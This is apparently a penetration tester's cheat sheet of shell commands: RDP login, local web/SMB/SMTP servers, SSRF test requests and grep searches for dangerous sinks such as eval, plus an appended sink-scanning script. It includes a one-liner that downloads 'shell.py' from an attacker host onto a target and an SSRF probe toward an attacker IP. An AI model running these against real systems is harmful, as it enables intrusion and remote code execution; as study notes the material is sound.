### XFreeRDP
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d: /v:machineName /u:username /p:userPassword /size:1780x1108
xfreerdp +nego +sec-rdp +sec-tls +sec-nla /d: /v:machineName /u:username /p:userPassword /size:1180x708
### cat with line numbers
cat -n filename.ext
### nano with line numbers
nano -c filename.ext
### search for injected sql commands
sudo tail -f /var/log/mysql/mysql.log | grep token_searchForUserTable
### quick download command from target machine
wget https://attacker:800/shell.py -P /tmp/
### sort file alphabetically
### remove the status codes
### remove the leading forward slash
### then save the results to a new text file
sort endpoints.txt | cut -d" " -f1 | sed 's#^/##' > endpoints_sorted.txt
### curl example
curl -i -X POST http://apigateway:8000/files/import
curl -i -X POST -H "Content-Type: application/json" -d '{"url":"http://192.168.119.120/ssrftest"}' http://apigateway:8000/files/import
#### Web Server
sudo python3 -m http.server 80
# If the installed Python version is 3.X
python3 -m http.server
# If the installed Python version is 2.X
python2 -m SimpleHTTPServer
#### start local apache web server
sudo systemctl start apache2
#### check log file
sudo tail -f /var/log/apache2/access.log
### Samba Server
1 – Create the folder that will be shared
mkdir /home/kali/class
2 – Use the Impacket tool
sudo impacket-smbserver class /home/kali/class
DONE – from the target, the attacker's shared directory is now reachable, for example in Windows Explorer:
\\attackerIP\class
### SMTPD
Start an SMTP server (the Python smtpd module) to listen for incoming SMTP connections, and use the DebuggingServer class to discard the messages after the server receives them.
sudo python3 -m smtpd -n -c DebuggingServer 0.0.0.0:25
Note: the smtpd module was removed in Python 3.12; on newer interpreters the aiosmtpd package provides the equivalent debugging server.
### grep
### Look for use of the eval function for exploitation
grep -rnw "eval(" . --color
-r is recursive
-n show line number
-w match whole word
### Searching for:
### $_user_location = 'public';
### using a grep search
grep -rnw /var/www/html/target -e "^.*user_location.*public.*" --color
### A quick grep search such as the following
### helps us find the searchFriends function implementation.
grep -rnw /var/www/html/ATutor -e "function searchFriends" --color
grep -r "document.write" ./ --include *.html
### grep for all script tags that also have a source set,
### removing any entries that are in vendor, plugin, or lib folders
grep -E "script.*src" commands.html | grep -Ev "vendor|lib|plugin"
### search for all instances of toJson
### and then use -v flag to look for the .send keyword
grep -r "toJson" ./ --exclude="compressed*" | grep -v "\.send"
grep -r "setup(" ./ --exclude="compressed*"
### Gold find:
this.WebsocketSudo.setup(this.getVar('websocket_url'), this.getVar('akey'));
grep -rl '<insert tableName="API_KEYS">' ./
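The grep one-liners above are single sink searches; the helper below, an added example that is not from the original notes, folds them into one reusable scan of a source tree that skips the vendor, lib and plugin directories the notes exclude and reports a hit count that can gate a code review. The sink pattern list, the file names and the sample tree are constructed assumptions.

```shell
# Added example, not from the original notes: one reusable sink scan that
# generalises the grep one-liners above. Sink list, file names and the
# sample tree are constructed assumptions.

# Call-style patterns so that plain words such as "evaluate" do not match
# (the notes rely on -w for the same reason). ERE syntax for grep -E.
SINK_PATTERNS='eval\(|document\.write\(|<script[^>]*src=|\.setup\('

# find_sinks DIR -> "path:line:text" for every hit, skipping the third-party
# directories the notes filter out with `grep -Ev "vendor|lib|plugin"`.
find_sinks() {
    grep -rnE "$SINK_PATTERNS" "$1" \
        --include='*.php' --include='*.js' --include='*.html' \
        --exclude-dir=vendor --exclude-dir=lib --exclude-dir=plugin
}

# count_sinks DIR -> number of hits (prints 0 when the tree is clean),
# handy as a review gate: fail the build when new sinks appear.
count_sinks() {
    find_sinks "$1" | wc -l | tr -d ' '
}

# Constructed sample tree: three app files with sinks and one vendored
# file that must be ignored. Prints the directory path.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/app" "$d/vendor/jquery"
    printf '<?php\n$x = $_GET["q"];\neval($x);\n' > "$d/app/search.php"
    printf '<html><script src="/static/app.js"></script></html>\n' > "$d/app/index.html"
    printf 'document.write(location.hash);\nthis.WebsocketSudo.setup(url, key);\n' > "$d/app/main.js"
    printf 'eval("vendored copy");\n' > "$d/vendor/jquery/jquery.min.js"
    echo "$d"
}

# Demo run: scan the sample tree and report the hit count, then clean up.
sample=$(make_sample_tree)
find_sinks "$sample"
printf 'sink hits outside third-party dirs: %s\n' "$(count_sinks "$sample")"
rm -rf "$sample"
```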